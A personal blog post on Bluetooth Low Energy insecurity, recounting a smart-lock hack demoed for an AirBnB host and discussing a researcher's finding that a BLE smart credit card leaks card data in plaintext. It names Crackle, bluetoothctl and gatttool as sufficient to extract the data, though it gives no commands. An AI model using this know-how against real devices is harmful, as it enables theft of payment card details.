I often find myself wondering “what could possibly go wrong?” sarcastically when I read about hotel doors that can be unlocked via BLE with an app and all other sorts of products with BLE connectivity. Being familiar and hands-on with the well known security issues of BLE are actually sometimes very useful. I once got a huge discount on an AirBnB stay after I demo-ed a hack on the host’s cute Catskills house’s smart lock, an August smart lock, and helped the host update the app and firmware. All credit to Jmaxzz for the excellent work presented at DefCon, which I simply partially reproduced.

In general, I always tell folks that it is never a good idea to use BLE for connectivity if you are building a product with high security requirements. That’s why, the moment I read about a smart credit card that uses BLE, my first thought was – yes, you guessed it right – “what could possibly go wrong?”. And Mike Ryan made my day with a blog post explaining precisely what could go wrong and, indeed, what did go wrong.

Mike Ryan is possibly the most well known Bluetooth security researcher out there. He is the author of one of my favorite tools, Crackle, which allows bruteforcing and breaking BLE session keys, unless the pairing was fully out of band (something that, by the way, I only know one consumer electronics device doing it: the Apple Watch. In the defense of all other consumer electronics, the last time I did iOS development, the APIs for an out of band pairing were not exposed).

It is interesting how, although some of the hacks against this smart card would be possible bruteforcing the connection by intercepting the pairing process, the issue here is simply a total lack of security and authentication of messages and communication. If an adversary got the hands on one of these devices, it is arguably very easy to pull in plaintext the credit card number, expiration date and cc numbers of all cards stored in the device. One does not even need to run Crackle, just standard Linux Bluetooth tools (bluetoothctl and gatttool).

Very interesting read indeed. And yet again, another example of why it is never a good idea to use BLE for connectivity in consumer electronics with high security requirements.

Advertisements